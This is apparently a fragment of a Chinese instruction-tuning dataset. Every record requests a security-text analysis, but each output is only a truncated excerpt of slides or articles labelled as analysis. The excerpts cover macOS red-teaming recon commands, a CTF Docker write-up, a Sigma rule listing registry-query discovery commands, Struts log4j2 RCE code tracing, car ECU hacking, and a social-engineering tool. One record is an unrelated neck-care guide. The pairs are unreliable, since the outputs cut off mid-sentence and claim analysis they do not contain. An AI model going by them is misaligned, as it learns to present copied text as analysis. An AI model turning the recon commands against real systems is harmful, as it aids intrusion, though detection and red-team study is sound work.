Defaced web pages (attrition.org) <img src=c:\\...\\Jon Doe\\My Documen", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# jsp --- ## 什么是 JavaServer Pages JavaServer Pages(JSP) 是一种技术能够开发支持动态内容的网页可以帮助开发人员在 HTML 页面中利用特殊的 JSP 标签插入 Java 代码其中大部分标签是以 `<%` 开始以 `%>` 结束的 JavaServer Pages 组件是 Java Servlet 的一种旨在为 Java web 应用程序实现一个用户界面Web 开发人员编写 JSP 作为文本文件结合 HTML 或 XHTML 代码XML 元素并嵌入 JSP 操作和命令 使用 JSP你可以通过 web 页面的形式收集来自用户的输入来自数据库或其他资源的当前记录并动态地创建 web 页面 JSP 标签可用于各种用途如从数据库检索信息或注册用户首选项访问 javabean 组件在页面之间传递控制在请求页面之间共享信息等 --- ## 为什么使用 JSP JavaServer Pages 的服务通常与通用网关接口(CGI)实现程序一样但 JSP 与 CGI 相比有几个优势 性能更好因为 JSP 允许在 HTML 页面本身嵌入动态元素而不需要创建一个单独的 CGI 文件 JSP 总是在服务器处理之前进行编译不像 CGI/Perl每次请求页面时都需要服务器加载一个解释器和目标脚本 JavaServer Pages 是建立在 Java servlet API 之上的就像 servletJSP 也可以访问所有强大的 Enterprise Java API包括 JDBCJNDIEJBJAXP 等等 JSP 页面可以与 servlet 结合使用来处理业务逻辑该模型是由 Java servlet 模板引擎支持的 最后JSP 还是 Java EE 不可分割的一部分是 enterprise 级别应用程序的一个完整平台这意味着 JSP 可以用于从最简单的应用程序到最复杂的应用程序中并实现要求 --- ## JSP 的优点 下列是 JSP 优于其他技术的另外的优点 * 与 Active Server Pages(ASP) 相比 JSP 的优点是双重的首先动态的部分是用 Java 编写的而不是用 Visual Basic 或其他特定的语言编写所以它使用起来更强大并且更容易第二它可以移植到其他操作系统和非 microsoft 的 Web 服务器中 * 与 Pure Servlets 相比 与用大量的 println 语句生成 HTML 相比JSP 能够更方便的写 (和修改!) 常规的 HTML * 与 Server-Side Includes(SSI)相比 SSI 只是用于简单的包含物而不是用于使用表单数据创建数据库链接等的 真正的 程序 * 与 JavaScript 相比 JavaScript 可以在客户端动态地生成 HTML但很难与 web 服务器交互来执行复杂的任务如数据库访问图像处理等 与 Static HTML 相比 当然常规的 HTML 不能包含动态的信息 --- ## JSP 案例 Servlet 就是一个能处理 HTTP 请求发送 HTTP 响应的小程序而发送响应无非就是获取 PrintWriter然后输出 HTML ``` PrintWriter pw = resp.getWriter(); pw.write(\"<html>\"); pw.write(\"<body>\"); pw.write(\"<h1>Welcome, \" + name + \"!</h1>\"); pw.write(\"</body>\"); pw.write(\"</html>\"); pw.flush(); ``` 只不过用 PrintWriter 输出 HTML 比较痛苦因为不但要正确编写 HTML还需要插入各种变量如果想在 Servlet 中输出一个类似新浪首页的 HTML写对 HTML 基本上不太可能 JSP 是 Java Server Pages 的缩写它的文件必须放到 `/src/main/webapp` 下文件名必须以. jsp 结尾整个文件与 HTML 并无太大区别但需要插入变量或者动态输出的地方使用特殊指令 `<% ... %>` 我们来编写一个 hello.jsp内容如下 ```java <html> <head> <title>Hello World - JSP</title> </head> <body> <%-- JSP Comment --%> <h1>Hello World!</h1> <p> <% out.println(\"Your IP address is \"); %> <span style=\"color:red\"> <%= request.getRemoteAddr() %> </span> </", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nCountering Denial of Information Attacks Gregory Conti www.cc.gatech.edu/~conti conti@acm.org Original Photos: National Geographic, Photoshopper: Unknown Disclaimer The views expressed in this presentation are those of the author and do not reflect the official policy or position of the United States Military Academy, the Department of the Army, the Department of Defense or the U.S. Government. image: http://www.leavenworth.army.mil/usdb/standard%20products/vtdefault.htm Denial of Information Attacks: Intentional Attacks that overwhelm the human or otherwise alter their decision making http://circadianshift.net/images/Virginia_Tech_1920s_NS5423_Y_small.jpg http://blogs.msdn.com/michkap/archive/2005/05/07/415335.aspx from Slashdot I have a little PHP script that I use whenever I get a phishing email. The script generates fake credit card numbers, expiration dates, etc. and repeatedly hits the phishing site's form dumping in random info. Any halfway intelligent phisher would record the IP address of each submission and just dump all of mine when he saw there were bogus, but it makes me feel good that I at least wasted some of his time ;) http://yro.slashdot.org/comments.pl?sid=150848&cid=12651434 The Problem of Information Growth  The surface WWW contains ~170TB (17xLOC)  IM generates five billion messages a day (750GB), or 274 terabytes a year.  Email generates about 400,000 TB/year.  P2P file exchange on the Internet is growing rapidly. The largest files exchanged are video files larger than 100 MB, but the most frequently exchanged files contain music (MP3 files). http://www.sims.berkeley.edu/research/projects/how-much-info-2003/ http://cagle.slate.msn.com/news/EvilEmailHackers/main.asp Source: http://www.advantage.msn.it/images/gallery/popup.gif Source: http://www.knockmail.com/Graphics/inbox.gif In the end, all the power of the IDS is ultimately controlled by a single judgment call on whether or not to take action. - from Hack Proofing Your Network DoI Attack Sce", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nCryptanalysis in real life II 研究團隊 王昶凱 邱弈豪 周立平 鄭振牟 演講者 周立平 1 Total page : 46 綱要 1. Mifare Classic(Crypto1)與Hitag2的介紹 YoYo card in Taipei 2. 攻擊手法和結果概述 3. Extra: Non-NIST ciphers 4. Q&A 2 Crypto1與Hitag2的介紹 NXP 公司所發售的產品 (Mifare Series & hitag2) Mifare Classic 系列的智慧卡使用 Crypto1已售5000萬個MIFARE讀卡機 50億個tag使用範圍相當廣泛(地鐵等) Hitag2使用於汽車電子安全鎖 3 Crypto1與Hitag2的介紹 Mifare Classic - Crypto1 Ex. YoYo 卡 Issue Crypto1 StructureMifare Classic protocol Hitag2 Hitag2 is very similar to Mifare Classic but stronger 攻擊手法 代數, 差分攻擊, or Both 4 Crypto1與Hitag2的介紹 - Mifare Classic protocol 5 我要與你通訊 OK!我選擇Mifare與我通訊 問個問題隨機亂數nT 先問你個問題隨機亂數{nR} 回答問題{aR}從nT計算出來 讀卡機回答正確卡片回答問題{aT} ->從nR計算出來 讀卡機回答錯誤卡片回答 -> error code (0x5)(0x0) 讀卡機 Reader 卡片 Tag ...... 認證完成開始進行讀寫..等動作 ISO14443 Mifare Classic protocol MIFARE Classic CHAP(Challenge-Handshake Authentication Protocol) 6 Crypto1與Hitag2的介紹 Crypto1與Hitag2的介紹 - Structure Structure Crypto1 ->Stream cipher Easy LFSR Hitag2 ->Stream cipher Hard LFSR 7 Crypto1與Hitag2的介紹 - Structure Mifare Classic - Crypto1 Mifare Classic  Hitag2 8 input 探討Mifare Classic 既有的安全議題 Brute force Crypto1  CPU 50 years / GPU 14 hrs Hitag2  N/A Non-Brute force PRNG(Pseudo random number generator)設計不良使其安全性降低 Parity 設計不良會洩漏部分的明文資訊 Filter Function 輸入部分設計不良 利用 keystream 將原始的密鑰還原 9 281/sec (use every possible key value to authenticate) 248/281 = 1001690308578.84 sec = 16694838476.31 min = 278247307.93 hr = 11593637.83 day = 31763.39 year 探討Mifare Classic 既有的安全議題 10 計算資源龐大$$ 風險太高(刑責) 代價太高(前兩 者選達成) 般電腦 在家即可完成 探討Mifare Classic 既有的安全議題 11 永遠有效 nT已經不太會重複 幾千個甚至幾萬次 才個重複 nT的變化規律已經 無法被預測 對於可變變數(nT nR)限制較為寬鬆 New card 探討Mifare Classic 既有的安全議題 - 代數  解方程式  SAT solver 針對Crypto1 stream cipher attack 奇偶攻擊連續認證攻擊 優點有效快速 缺點稍微改變保護機制攻擊就會失效 代數攻擊 (布林代數攻擊) 使用代數CNF表示再用SAT solver解方程式 優點適用般性的解方程式問題(攻擊其他種類) 缺點比針對性攻擊要慢些 12 Mate Soos: Extending SAT Solvers to Cryptographic Problems CryptoMiniSat2 13 代數攻擊 描述演算法 轉換成ANF 轉換成CNF 使用SAT Solver 給定組布林方程式求解有組變數值可滿方程式為真是否成立 ( X1  X2  X3 )  ( X2  X3  X4 )  ( X1   X4 ) = TRUE 轉換為CNF假如某布林方程式為5", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nGone Apple Pickin: Red Teaming macOS Environments in 2021 Cedric Owens DEF CON 29 BIO Offensive Security Engineer Blue Team Experience  macOS post exploitation Enjoy 80s/90s Nostalgia  @cedowens AGENDA  Why Do We Care about macOS?  Overviews Of Common Tech Environments  macOS Payloads & Post Exploitation  Other Attack Vectors  Detection Opportunities ITS MACOS WHY DO WE CARE?  Most companies are still Windows shops  SF Bay Area Tech Companies - opposite  Not as much Windows  macOS, Linux, other (Chromebooks), cloud  Interesting environments to assess ITS MACOS WHY DO WE CARE?  Is a slowly growing trend  Different animal from Windows, but still lots to poke at/try  Lots of damage can be done without compromising AD COMMON TECH STACKS 10,000 FT VIEW App Servers 80% 15% 5% Access restricted by VPN, VPC, ldap groups, etc. Access tokens/keys stored on corp laptops Prod Env Corp Env App Servers Some On Prem COMMON MACOS DEPLOYMENTS  Common management methods:  Custom  big money grip!  Managed with JAMF Pro  Pretty Common  Admin server  Infra Manager  Agent  Kandji  up and coming  Calum Hall/Luke Roberts BH 21 Talk on Abusing Remote Management COMMON JAMF DEPLOYMENT JAMF Admin Server (find by: $jamf checkJSSConnection) JAMF Agent JAMF Self Service REMOTE MANAGEMENT JAMF Management Server Jamf admin account with ssh to managed devices If remote management used, is there a static password being used? If enabled, ssh by default has full disk access! REMOTE MANAGEMENT JAMF Management Server Compromised JAMF admin creds JAMF Admin creds $jamf checkJSSConnection Push malicious policies/scripts Managed macOS Fleet A FEW VARIATIONS IN JAMF DEPLOYMENTS EX 1: MACOS BOUND TO AD JAMF agent on macOS fleet Bound to AD $ dscl /Active Directory/[Domain]/All Domains ls / $ ldapsearch -h [AD_srvr] -p 389 -x -D \"uid=[usrname],ou=[OU],dc=[domain],dc=com\" -b \"dc=domain,dc=com\" -W Tools like Machound, Bifrost would work $ klist, kcc, etc EX 2: ACCESS VIA NOMAD macOS fleet: not bound to AD Kerbe", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# Can't See You * Category: Misc. * 200 Points * Solved by the JCTF Team ## Description > It's too dark in here, can you help Alice find her way out? > > docker run -it g3rzi/rabbit_hole bash ## Solution Let's run the attached docker. ``` |\\\\ //( | \\\\ // ' ' \\\\ // / \\ )\\(( / )` `/ / __ \\ / (_O) \\ / \\________ _.(_) ) / (__, / / \\ / / \\_______/ ( \\ / \\ \\ / \\ \\/ \\ / ) / / / _ o__ / ( (_) //\\,\\ ( \\ ``~---~` ) \\ \\ / \\ \\ / \\ \\ / \\____/ \\_______/ ------------------------------------------------ \"...she found herself falling down a very deep well. Either the well was very deep, or she fell very slowly, for she had plenty of time as she went down to look about her and to wonder what was going to happen next. First, she tried to look down and make out what she was coming to, but it was too dark to see anything.\" /home # ``` Not too much to see here. The docker is running locally so this can't be an escape challenge. Let's inspect the docker container itself: ```console $ docker history --no-trunc g3rzi/rabbit_hole IMAGE CREATED CREATED BY SIZE COMMENT sha256:6c206a5f4eb94555206db9eb5cea0883fcaea96d4a10aee4ea9d05220737d119 3 months ago /bin/sh -c #(nop) WORKDIR /home 0B <missing> 3 months ago /bin/sh -c #(nop) ENTRYPOINT [\"/bin/sh\" \"-c\" \"clear; cat /home/message; sh;\"] 0B <missing> 3 months ago /bin/sh -c rm /tmp/Wonderland 0B <missing> 3 months ago /bin/sh -c #(nop) COPY file:562947c0a4dbfc439d967ce78b6a06318e475dff95157295a63e5cd1d357f299 in /home/message 932B <missing> 3 months ago /bin/sh -c #(nop) COPY dir:ce226651d1a2141a3df6d4bbb9135fb5de96b4f36ca8bd170d16f016f2ea00e2 in / 11.7MB <missing> 4 months ago /bin/sh -c #(nop) CMD [\"/bin/sh\"] 0B <missing> 4 months ago /bin/sh -c #(nop) ADD file:2a949686d9886ac7c10582a6c29116fd29d3077d02755e87e111870d63607725 in / 5.54MB ``` We can see that one of the layers removed a file! What are you, `/tmp/Wonderland`? To find it, we export the docker image to a `tar` file with `docker save --output rabbit_hole.tar g3rzi/rabbit_hole`. Then ", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nRE:Trace  Applied Reverse Engineering on OS X Tiller Beauchamp SAIC David Weston Microsoft DTRACE BACKGROUND What Is DTrace? *Dtrace was created by Sun Microsystems, Inc. and released under the Common Development and Distribution License (CDDL), a free software license based on the Mozilla Public License (MPL). DTrace Background  Kernel-based dynamic tracing framework  Created by Sun Microsystems  First released with Solaris 10 operating System  Now included with Apple OS X Leopard, QNX  June 10th, 2008, committed to CURRENT branch of FreeBSD 7, Will be in 8 STABLE (John Birrell)  OpenBSD, NetBSD, Linux? *Solaris is a trademark of Sun Microsystems, Inc. in the United States and/or other countries. DTrace Overview  DTrace is a framework for performance observability and debugging in real time  Tracing is made possible by thousands of probes placed on the fly throughout the system  Probes are points of instrumentation in the kernel  When a program execution passes one of these points, the probe that enabled it is said to have fired  DTrace can bind a set of actions to each probe DTrace Architecture Source: Solaris Dynamic Tracing Guide The D Language  D is an interpreted, block-structured language  D syntax is a subset of C  D programs are compiled into intermediate form  Intermediate form is validated for safety when your program is first examined by the DTrace kernel software  The DTrace execution environment handles any runtime errors The D Language  D does not use control-flow constructs such as if statements and loops  D program clauses are written as single, straight- line statement lists that trace an optional, fixed amount of data  D can conditionally trace data and modify control flow using logical expressions called predicates  A predicate is tested at probe firing before executing any statements DTrace Performance  DTrace is dynamic: probes are enabled only when you need them  No code is present for inactive probes  There is no performance degradation when ", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# T1012-win-查询注册表 ## 来自ATT&CK的描述 攻击者可以与Windows注册表交互以收集有关系统配置和已安装软件的信息 注册表包含大量有关操作系统配置软件和安全性的信息一些信息可能有助于攻击者在网络中进一步开展行动攻击者可以在自动发现期间使用查询注册表中的信息来定制后续行为包括攻击者是否完全感染目标或尝试特定操作 ## 测试案例 Windows server 2016模拟BabyShark执行执行的reg query HKEY_CURRENT_USER\\Software\\Microsoft\\Terminal Server Client\\Default命令由于缺少相应的样本本测试案例利用CMD窗口模拟以上命令 ## 检测日志 Windows 安全日志 ## 测试复现 ```dos C:\\Users\\Administrator>reg query \"HKEY_CURRENT_USER\\Software\\Microsoft\\Terminal Server Client\\Default\" /ve 错误: 系统找不到指定的注册表项或值 ``` ## 测试留痕 windows 安全日志进程创建子父进程进程命令行参数 ![T1012](https://image-host-toky.oss-cn-shanghai.aliyuncs.com/MOUytK.png) ## 检测规则/思路 ### sigma规则 ```yml title: windows本地执行reg query HKEY_CURRENT_USER\\Software\\Microsoft\\Terminal Server Client\\Default description: windows server 2016 references: - https://github.com/redcanaryco/atomic-red-team/blob/910a2a764a66b0905065d8bdedb04b37049a85db/atomics/T1012/T1012.md tags: T1012 status: experimental author: 12306Bro logsource: product: windows service: security detection: selection: EventID: 4688 #进程创建 Newprocessname: 'C:\\Windows\\System32\\reg.exe' #进程信息>新进程名称 Creatorprocessname: 'C:\\Windows\\System32\\cmd.exe' #进程信息>创建者进程名称 Processcommandline: - reg query \"HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Windows\" - reg query HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\RunServicesOnce - reg query HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunServicesOnce - reg query HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\RunServices - reg query HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunServices - reg query \"HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\Notify\" - reg query \"HKLM\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\Userinit\" - reg query \"HKCU\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\\\Shell\" - reg query \"HKLM\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\\\Shell\" - reg query HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\ShellServiceObjectDelayLoad - reg query HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOn", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nTruman Kain TEVORA Dragnet Your Social Engineering Sidekick TL;DR Your social engineering conversions will increase with Dragnet. Current States of: OSINT Analytics S.E. Engagements OSINT Manual Repetitive Fleeting when automated Analytics Big companies live off of it Jeff Bezos, 1997 3 years ago I was working at a quantitative hedge fund when I came across a startling statistic Analytics Youre ignoring it S.E. Engagements Choose Two One. Effective Quick Inexpensive Dragnet OSINT Automation Machine Learning Open-Source The Stack Vue.js Dragnet OSINT 1. Import Targets 2. Keep your hands near the wheel Dragnet Automation OSINT Gathering* Infrastructure Deployment Campaign Execution Data Correlation Dragnet ML P (creds | target, template) Dragnet ML 1. Tag your templates 2. Import prior conversion data 3. Then Dragnet ML 3. Say your prayers. DEMO Whats Next? Ringless Voicemail Drops Individual Targeting Distributed Vishing Native Mobile?! [Your Request Here] Truman Kain TEVORA Dragnet Your Social Engineering Sidekick Thank you! threat.tevora.com/dragnet", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n頸椎呵護指北 超機密 第2次雞友核心群報告書 Plan zur Komplementarität der Menschheit 1.Zwischenbericht 目录 颈椎病的危害和衍生症状 简单实用的颈椎呵护操 工作台的配置方案 借助外力的放松颈椎方式 颈椎病的危害和衍生症状  1颈椎病是由于椎骨受颈脖四面的水肿压迫而导致的身体其他部位与颈部与头部的供血不 足经常会引起头晕头疼颈椎酸疼骨刺等常见症状这直截影响到对身体的损害  2神经根型颈椎病患者通常情况下会有颈部疼痛的症状咳嗽喷嚏或上肢伸展以及颈 部过屈过伸等都会引起疼痛加剧  3颈部疼痛是神经根型颈椎病的主要临床表现疼痛多表现为钻痛或刀割样痛也可以是 持续性隐痛或酸痛并且颈部的疼痛还可能放射至手臂手指给患者带来痛苦  4神经根型颈椎病患者在急性发作时部分的患者会在患侧有手指指端麻痹的感觉并且 会有上肢的放射性疼痛的感觉疼痛会在夜间时加重 严峻影响了患者的睡眠有很多的 患者经常感觉到严峻失眠半夜颈椎疼痛难忍躺着根本睡不着有时候就是坐在沙发睡 一晚所谓打蛇打七寸而颈椎却恰恰在身体的七寸颈椎一旦出现问题全身都随着不 舒适  5颈椎病严峻者可造成亚健康有时候还会引起对身体的早衰心烦记忆力减退眩晕 耳鸣等严峻的影响到了人们的生活质量  6部分的神经根型颈椎病患者会有颈部僵直的症状并且会在棘突棘旁或肩胛骨部位有 压痛 颈椎呵护操放松颈椎胸椎腰椎 颈椎呵护操 颈椎呵护操 颈椎呵护操 颈椎呵护操 颈椎呵护操 工作台配置 显示器垫高到平视是显示器的中间 位置 桌子和椅子的配比基本是正常的放松 坐下的时候不弯腰就是最好的 椅子和桌子不易太高因为要保证你 的腿在放松状态下可以正常的踩在地 面上 颈椎放松  SKG按摩仪电疗  按摩枕与物理按摩仪  选一个好枕头一般的高度是自己握 拳的厚度乳胶枕较为舒服  去正规的按摩店按摩但是如果是病 理性难受不要随便按摩病理性就要 去看医生按摩只能够缓解疲惫并不 能治病 END TOP SECRET", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\ninstall === 安装或升级软件或备份数据 ## 补充说明 **install命令** 的作用是安装或升级软件或备份数据它的使用权限是所有用户install命令和cp命令类似都可以将文件/目录拷贝到指定的地点但是install允许你控制目标文件的属性install通常用于程序的makefile使用它来将程序拷贝到目标安装目录 ### 语法 ```shell install [OPTION]... [-T] SOURCE DEST install [OPTION]... SOURCE... DIRECTORY install [OPTION]... -t DIRECTORY SOURCE... install [OPTION]... -d DIRECTORY... ``` 在前两种格式中会将<来源>复制至<目的地>或将多个<来源>文件复制至已存在的<目录>同时设定权限模式及所有者/所属组在第三种格式中会创建所有指定的目录及它们的主目录长选项必须用的参数在使用短选项时也是必须的 ### 选项 ```shell --backup[=CONTROL]为每个已存在的目的地文件进行备份 -b类似 --backup但不接受任何参数 -c(此选项不作处理) -d--directory所有参数都作为目录处理而且会创建指定目录的所有主目录 -D创建<目的地>前的所有主目录然后将<来源>复制至 <目的地>在第一种使用格式中有用 -g--group=组自行设定所属组而不是进程目前的所属组 -m--mode=模式自行设定权限模式 (像chmod)而不是rwxr-xr-x -o--owner=所有者自行设定所有者 (只适用于超级用户) -p--preserve-timestamps以<来源>文件的访问/修改时间作为相应的目的地文件的时间属性 -s--strip用strip命令删除symbol table只适用于第一及第二种使用格式 -S--suffix=后缀自行指定备份文件的<后缀> -v--verbose处理每个文件/目录时印出名称 --help显示此帮助信息并离开 --version显示版本信息并离开 ``` ### 实例 ```shell install -d [option] DIRECTORY [DIRECTORY...] ``` 支持多个类似`mkdir -p`支持递归例如`install -d a/b/c e/f`结果和`mkdir -p a/b/c e/f`一样 ```shell install [option] SOURCE DEST ``` **复制SOURCE文件测试不能是目录到DEST file文件** ```shell install a/e c 结果类似 cp a/e c #注意c必须是文件 ``` **有用选项`-D`** ```shell install -D x a/b/c 效果类似 mkdir -p a/b && cp x a/b/c ``` ```shell install [option] SOURCE [SOURCE...] DIRECTORY ``` **复制多个SOURCE文件到目的目录** ```shell install a/* d ``` 其中d是目录", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n1 OLONNONS-StrutsO logQjO RCE研究 看到有分析Struts2 log4j2 RCE 漏洞点位于 org.apache.struts2.dispatcher.DefaultStaticContentLoader#process 具体调过程为先根据过滤器配置 进 org.apache.struts2.dispatcher.filter.StrutsExecuteFilter#doFilter 1.前 2 当mapping为空时也就是我们请求的路径找不到action时进 executeStaticResourceRequest 先获取 getServletPath 如果 staticResourceLoader.canHandle(resourcePath) 为真的 话进 findStaticResource canHandle的代码如下 Java 复制代码 public boolean executeStaticResourceRequest(HttpServletRequest request, HttpServletResponse response) throws IOException, ServletException { String resourcePath = RequestUtils.getServletPath(request); if (\"\".equals(resourcePath) && null != request.getPathInfo()) { resourcePath = request.getPathInfo(); } StaticContentLoader staticResourceLoader = (StaticContentLoader)this.dispatcher.getContainer().getInstance(StaticCont entLoader.class); if (staticResourceLoader.canHandle(resourcePath)) { staticResourceLoader.findStaticResource(resourcePath, request, response); return true; } else { return false; } } 1 2 3 4 5 6 7 8 9 10 11 12 13 14 3 判断我们路径中师傅包含 /struts/ 或 /static/ 进 findStaticResource Java 复制代码 public boolean canHandle(String resourcePath) { return this.serveStatic && (resourcePath.startsWith(\"/struts/\") || resourcePath.startsWith(\"/static/\")); } 1 2 3 4 先如果请求的件存在就读取件读取的件位于 Java 复制代码 public void findStaticResource(String path, HttpServletRequest request, HttpServletResponse response) throws IOException { String name = this.cleanupPath(path); Iterator i$ = this.pathPrefixes.iterator(); InputStream is; do { while(true) { String pathPrefix; URL resourceUrl; do { if (!i$.hasNext()) { try { response.sendError(404); } catch (IOException var10) { this.LOG.warn(\"Unable to send error response, code: {};\", 404, var10); } catch (IllegalStateException var11) { this.LOG.warn(\"Unable to send error response, code: {}; isCommited: {};\", 404, response.isCommitted(), var11); } return; } pathPrefix = (String)i$.next(); resourceUrl = this.findResource(this.buildPath(name, pathPrefix)); } while(re", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nHack your car for Boost and Power By Aaron Higbee Aaron.higbee@intrepidusgroup.com http://blog.phishme.com http://intrepidusgroup.com  This slide intentionally left blank.  Video clips Who Am I?  ASE certified mechanic?  Nope  CISSP  Not anymore, I spent my dues on something useful, car parts.  Im just a geek who loves technology, cars, and hacks  I hacked my own car using google, Internet forums, open source software, sweat, and bloody knuckles  Thanks to Intrepidus Group What is this talk NOT about  How to maintain your cars warranty in good standing.  Staying green? Fuel economy? No way  Installing a computer in your car to play MP3s and WoW? Nope.  Wardriving? Thats so 2002. What this talk IS about  0wning your car, to make it Faster  Introduction to modern computer controlled engine management  Tools for ECU programming  Commercial and Open source  Car protocols  The role of difference sensors for electronic fuel injection  Performance tuning theory Continued on next page Continued: What this talk IS about  Whats a dyno and how to get data without one  Analyzing logs and making changes  Turbochargers and supercharges  Fuel octane, ignition timing  Removing pesky emissions equipment Continued on next page Continued: What this talk IS about  Computer controlled alcohol or methanol to cope with high boost and low quality fuel  Other ECU data and privacy concerns  ECU firmware piracy  Bypassing RFID chips in car keys  Car modification laws  ODBII emissions testing Continued on next page Car hackers  American iron  Carburetor  Ignition advance  Dirt and grime How these guys did it Their power making tools: And their secret weapon Uncle Jesses moonshine  Yeeeeeeehaw! Todays car hackers Todays power making tools: Some things remain the same Then And now Moonshine , alcohol, methanol Dukes method  Pour moonshine in the general lees gas tank.  Result: Todays method *Picture from aquamist.co.uk Theres no replacement for displacement? 454 ci 8 cylinder big block 500hp  7.", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nWeb API 安全漏洞与检测防护 徐诣博 2017.8.25 目录 Contents Page 2Web API 安全漏洞 3WAF Web API 漏洞防护 4Web API 安全开发建议 1 Web API 安全威胁 目录 Contents Page 第 1 章 Web API 安全威胁 什么是 Web API  使用 HTTP 协议通过网络调用的 API  Web API 是一个 Web 系统可以通过访问 URI 与服务器完成信息交互或者获取存放在服务 器上的数据信息等调用者通过程序访问并机 械地使用这些数据  Web API 和 Web Services  JSON 谁在用 Web API API 安全威胁  非法信息窃取  浏览器访问 Web API 的意外  Web API 业务漏洞  Web API 访问速率限制不当  HTTP 头部设置不当 非法信息窃取  HTTP 嗅探/HTTPS 嗅探会话劫持  HTTPS TLS 1.2  SSLStrip 攻击  HSTS  SSL 漏洞  2014 OpenSSL Heartbleed 安全漏洞  CCS 注入漏洞  客户端证书验证漏洞  证书有效性验证  HTTPS性能  是否允许一些 Web API 采用 HTTP 浏览器访问 Web API 的意外  XSS  输入/输出过滤  严格的 Content-Type 限制  CSRF  CSRF Token  XXE  XML 解析  JSON劫持  X-Requeated-With  浏览器 JSON 数据识别  禁止 Javascript 执行 JSON 数据 Web API 业务漏洞  参数篡改  连续编号 ID /订单  1 元支付  重放攻击  伪装支付  权限控制  越权操作 Web API 访问速率限制不当  API 大规模访问/DoS 攻击  API 访问速率控制  限制单用户访问次数  识别用户/限速单位/何时重置  429 状态码  HTTP/1.1 429 Too Many Requests  Retry-After: 3600  HTTP 头部传递限速信息  X-RateLimit-Limit 单位时间访问上限  X-RateLimit-Remaining 剩余访问次数  X-RateLimit-Rest 访问次数重置时间 HTTP 头部设置不当  X-Content-Type-Options: nosniff  > = IE8 nosniff  X-XSS-Protection  > = IE8 X-XSS-Protection: 1; mode=block  Chrome/Firefox 中无效  X-Frame-Options  Deny <frame>,<iframe>,<object>  > = IE8 deny  Content-Security-Policy  减轻 XSS 定义 script,images,fonts,css 白名单 HTTP 头部设置不当  Strict-Transport-Security  HSTS  Strict-Transport-Security: max-age=<expire-time>; preload  Public-Key-Pins  HTTP-based pulic key pinning HPKP  Public-Key-Pins: pin-sha256=<base64==>; max-age=<expireTime>; report- uri=<reportURI>  https://www.ssllabs.com/ssltest/  Set-Cookie  Secure  HttpOnly Github API 首部 目录 Contents Page 第 2 章 Web API 安全漏洞 常见的 Web API 安全漏洞  WordPress 4.7 / 4.7.1 REST API 内容注入漏洞  Drupal Module RESTWS 7.x - Remote PHP Code Execution  SugarCRM 6.5.23 - REST PHP Object Injection Exploit  Apache Struts - REST Plugin With Dynamic Method Invocation Remote Code Execution  Oracle GlassFish Server - REST CSRF  QQ Browser 9.6 API 权限控制问题导致泄露隐私模式  Hacking DockerRegistry API 未授权访问 WordPress REST API 内容注入漏洞 P", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nHacking Desire Reverse-engineering what people want Ian Clarke, CEO Uprizer Labs ian@uprizer.com Why?  Everyone has needs and desires  If we can predict these, then we can give people what they want  This will make them happy  ???  Profit! Specific problems we could solve  Music (last.fm, Indy, Pandora)  Movies (Netflix)  Advertising (behavioral advertising)  Dating Existing approach: Item based CF  People who liked X also liked these Pros Cons Simple to implement Naive - relies on a single piece of information about the user Easy for end-users to understand Limited diversity in recommendations Existing approach: User based CF  People like you liked these Pros Cons Can develop quite nuanced view of a users preferences Requires a lot of data per-user to accurately determine similarity Easy for end-users to understand Can be hard to scale - naive implementation is O(N2) Representing user preference -10.0 -5.0 0 5.0 10.0 Action Violence Sci-Fi Romance -11.25 -3.75 3.75 11.25 Action Violence Sci-Fi Romance Ian: Robocop: Computing user preference Computing user preference  User preferences are A B C D Computing user preference  User preferences are A B C D  Item features are e f g h Computing user preference  User preferences are A B C D  Item features are e f g h  Rating = Ae + Bf + Cg + Dh Computing user preference  User preferences are A B C D  Item features are e f g h  Rating = Ae + Bf + Cg + Dh  But... Computing user preference  User preferences are A B C D  Item features are e f g h  Rating = Ae + Bf + Cg + Dh  But...  How do we determine values for A, B, C, D, e, f, g, and h? Optimization through Gradient Descent  Find the optimal by gradually moving towards it  Similar to a ball rolling down a hill  Be careful of local minima Choosing features Choosing features  How do we decide what the important features of something are? Choosing features  How do we decide what the important features of something are?  We dont need to! We let the gradient descent algorithm figure", "category": "text_analysis", "source": "security_papers"}
